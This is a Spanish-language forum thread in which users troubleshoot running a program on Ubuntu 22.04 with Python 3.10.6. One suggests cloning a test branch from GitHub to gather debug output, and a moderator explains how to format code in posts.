No se si exactamente es lo que buscas. Respecto a la versión de Python es 3.10.6 y la de Ubuntu es Ubuntu 22.04.1 LTS. Si he de decirte que me ha dado problemas de falta de librerías y demás hasta que he actualizado la version de ubuntu que es cuando he podido lanzar el programa. En fin, cualquier duda me indicas a ver si podemos echarlo a andar. Gracias alexx.

🗨️ 8
alezz

Sí, es la primera linea donde define el token, y en principio estaría bien.

He probado con la ubuntu 22.10 y me ha funcionado, ahora en un rato me bajo y pruebo con la LTS.

Edit: Bueno la LTS también ha funcionado. Luego en un rato creo una branch en github con algún cambio para ver si podemos ver porqué no está funcionando en tu caso.

alezz

Descargate la branch test: git clone -b test https://github.com/alez-repos/ztef8648p.git

Ejecutala y guarda la salida en un pastebin o algo ya que será algo extensa y pásamela para echarle un vistazo.

🗨️ 6
PakorroGalvez
PakorroGalvez
🗨️ 1
alezz
alezz
PakorroGalvez
PakorroGalvez
🗨️ 1
alezz
alezz
PakorroGalvez
PakorroGalvez
🗨️ 1
alezz
alezz
Josh

@PakorroGalvez @alezz tener en cuenta esto al meter código en el foro o os dará problemas (me autoborro en un rato):

Para incluir correctamente en tu mensaje comandos, código, logs, nombres de archivos, etc. debes escribirlo dentro de comillas simples. Por ejemplo: `comando` se muestra como comando.

También puedes escribirlo en varias líneas, simplemente rodeándolo con sendas líneas con solo una comilla simple `:

`
comando
otro comando
`

Haz click sobre la pestaña ? en el editor de mensajes para saber más sobre cómo formatear tus mensajes correctamente.

Hay 4 páginas posteriores con más temas